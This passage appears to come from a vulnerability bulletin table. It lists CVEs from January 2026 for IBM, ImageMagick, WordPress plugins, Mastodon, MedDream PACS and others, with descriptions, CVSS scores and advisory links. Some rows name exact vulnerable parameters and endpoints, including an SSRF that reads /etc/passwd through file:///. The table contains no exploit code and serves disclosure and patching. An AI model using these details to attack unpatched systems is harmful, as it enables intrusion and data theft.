| IBM--Application Gateway | IBM Application Gateway 23.10 through 25.09 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. | 2026-01-20 | 5.4 | CVE-2025-36397 | https://www.ibm.com/support/pages/node/7256857 |
| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 6.4 | CVE-2025-36408 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 5.4 | CVE-2025-36409 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--ApplinX | IBM ApplinX 11.1 could disclose sensitive information about server architecture that could aid in further attacks against the system. | 2026-01-20 | 5.3 | CVE-2025-36419 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--Aspera Console | IBM Aspera Console 3.4.7 stores potentially sensitive information in log files that could be read by a local privileged user. | 2026-01-20 | 4.9 | CVE-2025-13925 | https://www.ibm.com/support/pages/node/7256544 |
| IBM--Business Automation Workflow containers | IBM Business Automation Workflow containers 25.0.0 through 25.0.0 Interim Fix 002, 24.0.1 through 24.0.1 Interim Fix 005, and 24.0.0 through 24.0.0 Interim Fix 006, and IBM Cloud Pak for Business Automation may disclose sensitive configuration information in a config map. | 2026-01-20 | 5.5 | CVE-2025-36058 | https://www.ibm.com/support/pages/node/7256777 |
| IBM--Business Automation Workflow containers | IBM Business Automation Workflow containers 25.0.0 through 25.0.0 Interim Fix 002, 24.0.1 through 24.0.1 Interim Fix 005, and 24.0.0 through 24.0.0 Interim Fix 006, and IBM Cloud Pak for Business Automation could allow a local user with access to the container to execute OS system calls. | 2026-01-20 | 4.7 | CVE-2025-36059 | https://www.ibm.com/support/pages/node/7256777 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory. | 2026-01-20 | 5.9 | CVE-2025-1719 | https://www.ibm.com/support/pages/node/7257006 |
| IBM--Concert | IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory. | 2026-01-20 | 5.9 | CVE-2025-1722 | https://www.ibm.com/support/pages/node/7257006 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 does not invalidate session after a logout which could allow an authenticated user to impersonate another user on the system. | 2026-01-20 | 6.3 | CVE-2025-36063 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 does not invalidate session after a browser closure which could allow an authenticated user to impersonate another user on the system. | 2026-01-20 | 6.3 | CVE-2025-36065 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 6.1 | CVE-2025-36066 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0.00 through 5.2.0.12 does not invalidate the session ID after use, which could allow an authenticated user to impersonate another user on the system. | 2026-01-20 | 6.3 | CVE-2025-36115 | https://www.ibm.com/support/pages/node/7257244 |
| IBM--Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 | IBM Sterling Connect:Express Adapter for Sterling B2B Integrator 5.2.0 5.2.0.00 through 5.2.0.12 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2026-01-20 | 5.4 | CVE-2025-36113 | https://www.ibm.com/support/pages/node/7257244 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. The BilateralBlurImage method will allocate a set of double buffers inside AcquireBilateralTLS. But, in versions prior to 7.1.2-13, the last element in the set is not properly initialized. This will result in a release of an invalid pointer inside DestroyBilateralTLS when the memory allocation fails. Version 7.1.2-13 contains a patch for the issue. | 2026-01-20 | 6.5 | CVE-2026-22770 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-39h3-g67r-7g3c https://github.com/ImageMagick/ImageMagick/commit/3e0330721020e0c5bb52e4b77c347527dd71658e |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Versions 14.10.1 and below have a NULL pointer dereference vulnerability in the MSL (Magick Scripting Language) parser when processing <comment> tags before images are loaded. This can lead to DoS attack due to assertion failure (debug builds) or NULL pointer dereference (release builds). This issue is fixed in version 14.10.2. | 2026-01-22 | 6.5 | CVE-2026-23952 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5vx3-wx4q-6cj8 https://github.com/dlemstra/Magick.NET/releases/tag/14.10.2 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Versions prior to 7.1.2-13 have a stack overflow via infinite recursion in MSL (Magick Scripting Language) `<write>` command when writing to MSL format. Version 7.1.2-13 fixes the issue. | 2026-01-20 | 5.5 | CVE-2026-23874 | https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9vj4-wc7r-p844 |
| iqonicdesign--KiviCare Clinic & Patient Management System (EHR) | The KiviCare - Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization checks in the uploadMedicalReport() function in all versions up to, and including, 3.6.15. This makes it possible for unauthenticated attackers to upload text files and PDF documents to the affected site's server which may be leveraged for further attacks such as hosting malicious content or phishing pages via PDF files. | 2026-01-23 | 5.3 | CVE-2026-0927 | https://www.wordfence.com/threat-intel/vulnerabilities/id/489931ef-bac3-4de8-84ec-6f226d96f778?source=cve https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php#L1328 https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/tags/3.6.15/app/controllers/KCAppointmentController.php#L1328 https://plugins.trac.wordpress.org/changeset/3443088/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php |
| itsourcecode--Society Management System | A vulnerability was identified in itsourcecode Society Management System 1.0. This affects an unknown function of the file /admin/expenses.php. Manipulation of the argument `detail` leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-01-19 | 4.3 | CVE-2026-1134 | VDB-341724 (itsourcecode Society Management System expenses.php cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #735156 (itsourcecode Society Management System V1.0 cross site scripting); https://github.com/TEhS411/cve/issues/7 https://itsourcecode.com/ |
| itsourcecode--Society Management System | A security flaw has been discovered in itsourcecode Society Management System 1.0. This impacts an unknown function of the file /admin/activity.php. Manipulation of the argument `Title` results in cross site scripting. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 4.3 | CVE-2026-1135 | VDB-341725 (itsourcecode Society Management System activity.php cross site scripting); CTI Indicators (IOB, IOC, TTP, IOA); Submit #735157 (itsourcecode Society Management System V1.0 cross site scripting); https://github.com/TEhS411/cve/issues/8 https://itsourcecode.com/ |
| jamiesage123--MyBB Thread Redirect Plugin | MyBB Thread Redirect Plugin 0.2.1 contains a cross-site scripting vulnerability in the custom text input field for thread redirects. Attackers can inject malicious SVG scripts that will execute when other users view the thread, allowing arbitrary script execution. | 2026-01-23 | 6.1 | CVE-2018-25116 | ExploitDB-49505 Thread Redirect Plugin GitHub Repository VulnCheck Advisory: MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting |
| kohler--hotcrp | HotCRP is conference review software. Starting in commit aa20ef288828b04550950cf67c831af8a525f508 and prior to commit ceacd5f1476458792c44c6a993670f02c984b4a0, authors with at least one submission on a HotCRP site could use the document API to download any documents (PDFs, attachments) associated with any submission. The problem was patched in commit ceacd5f1476458792c44c6a993670f02c984b4a0. | 2026-01-19 | 6.5 | CVE-2026-23878 | https://github.com/kohler/hotcrp/security/advisories/GHSA-vh3x-xwj4-jvqx https://github.com/kohler/hotcrp/commit/aa20ef288828b04550950cf67c831af8a525f508 https://github.com/kohler/hotcrp/commit/ceacd5f1476458792c44c6a993670f02c984b4a0 |
| kometschuh--Same Category Posts | The Same Category Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget title placeholder functionality in all versions up to, and including, 1.1.19. This is due to the use of `htmlspecialchars_decode()` on taxonomy term names before output, which decodes HTML entities that WordPress intentionally encodes for safety. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 5.4 | CVE-2025-14797 | https://www.wordfence.com/threat-intel/vulnerabilities/id/70434876-4876-4da8-9af1-6f6ef5632f26?source=cve https://plugins.trac.wordpress.org/browser/same-category-posts/tags/1.1.19/same-category-posts.php#L665 https://plugins.trac.wordpress.org/browser/same-category-posts/tags/1.1.19/same-category-posts.php#L639 https://plugins.trac.wordpress.org/browser/same-category-posts/tags/1.1.19/same-category-posts.php#L707 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444428%40same-category-posts&new=3444428%40same-category-posts&sfp_email=&sfph_mail= |
| leadbi--LeadBI Plugin for WordPress | The LeadBI Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_id' parameter of the 'leadbi_form' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1189 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3a196eaa-64c7-447b-9384-b58fcba57ec0?source=cve https://wordpress.org/plugins/leadbi/ https://plugins.trac.wordpress.org/browser/leadbi/trunk/includes/Plugin.php#L72 https://plugins.trac.wordpress.org/browser/leadbi/tags/1.7/includes/Plugin.php#L72 |
| legalweb--WP DSGVO Tools (GDPR) | The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lw_content_block' shortcode in all versions up to, and including, 3.1.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-23 | 6.4 | CVE-2026-0914 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4474c79b-f93a-4725-8345-ad5c5260913c?source=cve https://plugins.trac.wordpress.org/browser/shapepress-dsgvo/tags/3.1.35/public/shortcodes/content-block-shortcode.php#L17 https://plugins.trac.wordpress.org/changeset/3440083/ |
| lovor--Cookie consent for developers | The Cookie consent for developers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple settings fields in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1084 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c16918a9-7b73-418d-adbd-aa17cb1d8cf8?source=cve https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/trunk/admin/class-ntg-cookie-consent-admin.php#L112 https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/trunk/admin/partials/ntg-cookie-consent-admin-display.php#L108 https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/tags/1.7.1/admin/class-ntg-cookie-consent-admin.php#L112 https://plugins.trac.wordpress.org/browser/cookie-consent-for-developers/tags/1.7.1/admin/partials/ntg-cookie-consent-admin-display.php#L108 |
| magazine3--Schema & Structured Data for WP & AMP | The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'saswp_custom_schema_field' profile field in all versions up to, and including, 1.54 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-23 | 6.4 | CVE-2025-14069 | https://www.wordfence.com/threat-intel/vulnerabilities/id/651a7036-d421-41b7-91db-102e60d8274e?source=cve https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.53/admin_section/common-function.php#L1874 https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.53/admin_section/structure-admin.php#L2605 https://plugins.trac.wordpress.org/browser/schema-and-structured-data-for-wp/tags/1.53/output/function.php#L171 https://plugins.trac.wordpress.org/changeset/3441582/schema-and-structured-data-for-wp/trunk?contextall=1&old=3429983&old_path=%2Fschema-and-structured-data-for-wp%2Ftrunk#file0 |
| mainichiweb--Friendly Functions for Welcart | The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the settings page. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1208 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6cc709e0-870b-4d12-9ac8-55da498768a1?source=cve https://plugins.trac.wordpress.org/browser/friendly-functions-for-welcart/tags/1.2.5/ffw_function_settings.php#L53 https://plugins.trac.wordpress.org/browser/friendly-functions-for-welcart/tags/1.2.5/ffw_function_settings.php#L58 https://plugins.trac.wordpress.org/changeset/3445305/ |
| marcinlawrowski--Wise Analytics | The Wise Analytics plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.9. This is due to missing capability checks on the REST API endpoint '/wise-analytics/v1/report'. This makes it possible for unauthenticated attackers to access sensitive analytics data including administrator usernames, login timestamps, visitor tracking information, and business intelligence data via the 'name' parameter granted they can send unauthenticated requests. | 2026-01-24 | 5.3 | CVE-2025-14609 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d92c80cb-080b-4774-8c66-1d5cf68e771f?source=cve https://plugins.trac.wordpress.org/browser/wise-analytics/trunk/src/Endpoints/ReportsEndpoint.php#L43 https://plugins.trac.wordpress.org/browser/wise-analytics/tags/1.1.9/src/Endpoints/ReportsEndpoint.php#L43 |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, an insecure direct object reference in the web push subscription update endpoint lets any authenticated user update another user's push subscription by guessing or obtaining the numeric subscription id. This can be used to disrupt push notifications for other users and also leaks the web push subscription endpoint. Any user with a web push subscription is impacted, because another authenticated user can tamper with their push subscription settings if they can guess or obtain the subscription id. This allows an attacker to disrupt push notifications by changing the policy (whether to filter notifications from non-followers or non-followed users) and subscribed notification types of their victims. Additionally, the endpoint returns the subscription object, which includes the push notification endpoint for this subscription, but not its keypair. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 6.5 | CVE-2026-23964 | https://github.com/mastodon/mastodon/security/advisories/GHSA-f3q8-7vw3-69v4 https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon allows server administrators to suspend remote users to prevent interactions. However, some logic errors allow already-known posts from such suspended users to appear in timelines if boosted. Furthermore, under certain circumstances, previously-unknown posts from suspended users can be processed. This issue allows old posts from suspended users to occasionally end up on timelines on all Mastodon versions. Additionally, on Mastodon versions from v4.5.0 to v4.5.4, v4.4.5 to v4.4.11, v4.3.13 to v4.3.17, and v4.2.26 to v4.2.29, remote suspended users can partially bypass the suspension to get new posts in. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 5.3 | CVE-2026-23961 | https://github.com/mastodon/mastodon/security/advisories/GHSA-5h2f-wg8j-xqwp https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, the server does not enforce a maximum length for the names of lists or filters, or for filter keywords, allowing any user to set an arbitrarily long string as the name or keyword. Any local user can abuse the list or filter fields to cause disproportionate storage and computing resource usage. They can additionally cause their own web interface to be unusable, although they must intentionally do this to themselves or unknowingly approve a malicious API client. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched. | 2026-01-22 | 4.3 | CVE-2026-23963 | https://github.com/mastodon/mastodon/security/advisories/GHSA-6x3w-9g92-gvf3 https://github.com/mastodon/mastodon/releases/tag/v4.3.18 https://github.com/mastodon/mastodon/releases/tag/v4.4.12 https://github.com/mastodon/mastodon/releases/tag/v4.5.5 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the ldapUser functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-36556 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2272 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the sendOruReport functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-44000 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2270 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the fetchPriorStudies functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-46270 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2258 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the downloadZip functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-53516 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2254 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyTranscript functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-53707 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2267 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyHL7Route functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-53854 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2265 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54157 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2256 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the emailfailedjob functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54495 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2255 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the existingUser functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54778 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2257 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyAutopurgeFilter functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54814 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2261 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the autoPurge functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a URL to a malicious website to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54817 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2253 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyAeTitle functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54852 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2260 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyUser functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54853 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2268 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyCoercion functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-54861 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2262 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyAnonymize functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-55071 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2259 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the notifynewstudy functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-57786 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2269 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyRoute functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-57787 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2266 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyEmail functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-57881 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2263 |
| MedDream--MedDream PACS Premium | A reflected cross-site scripting (xss) vulnerability exists in the modifyHL7App functionality of MedDream PACS Premium 7.3.6.870. A specially crafted malicious URL can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger this vulnerability. | 2026-01-20 | 6.1 | CVE-2025-58080 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2264 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the status parameter. | 2026-01-20 | 6.1 | CVE-2025-58087 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the archivedir parameter. | 2026-01-20 | 6.1 | CVE-2025-58088 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the longtermdir parameter. | 2026-01-20 | 6.1 | CVE-2025-58089 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the uploaddir parameter. | 2026-01-20 | 6.1 | CVE-2025-58090 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the thumbnaildir parameter. | 2026-01-20 | 6.1 | CVE-2025-58091 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the phpexe parameter. | 2026-01-20 | 6.1 | CVE-2025-58092 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the phpdir parameter. | 2026-01-20 | 6.1 | CVE-2025-58093 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the worklistsrc parameter. | 2026-01-20 | 6.1 | CVE-2025-58094 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| MedDream--MedDream PACS Premium | Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities. This vulnerability affects the imagedir parameter. | 2026-01-20 | 6.1 | CVE-2025-58095 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271 |
| mehtevas--Responsive Header Plugin | The Responsive Header plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple plugin settings parameters in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1300 | https://www.wordfence.com/threat-intel/vulnerabilities/id/30821418-48c0-4bc6-8bf1-f558671bff24?source=cve https://downloads.wordpress.org/plugin/responsive-header.1.0.zip https://wordpress.org/plugins/responsive-header/ https://plugins.trac.wordpress.org/browser/responsive-header/trunk/rhp-settings.php#L103 https://plugins.trac.wordpress.org/browser/responsive-header/tags/1.0/rhp-settings.php#L103 |
| Mfscripts--YetiShare File Hosting Script | YetiShare File Hosting Script 5.1.0 contains a server-side request forgery vulnerability that allows attackers to read local system files through the remote file upload feature. Attackers can exploit the url parameter in the url_upload_handler endpoint to access sensitive files like /etc/passwd by using file:/// protocol. | 2026-01-23 | 4 | CVE-2021-47899 | ExploitDB-49534 Vendor Homepage Software Product Page VulnCheck Advisory: YetiShare File Hosting Script 5.1.0 Remote File Upload SSRF Vulnerability |
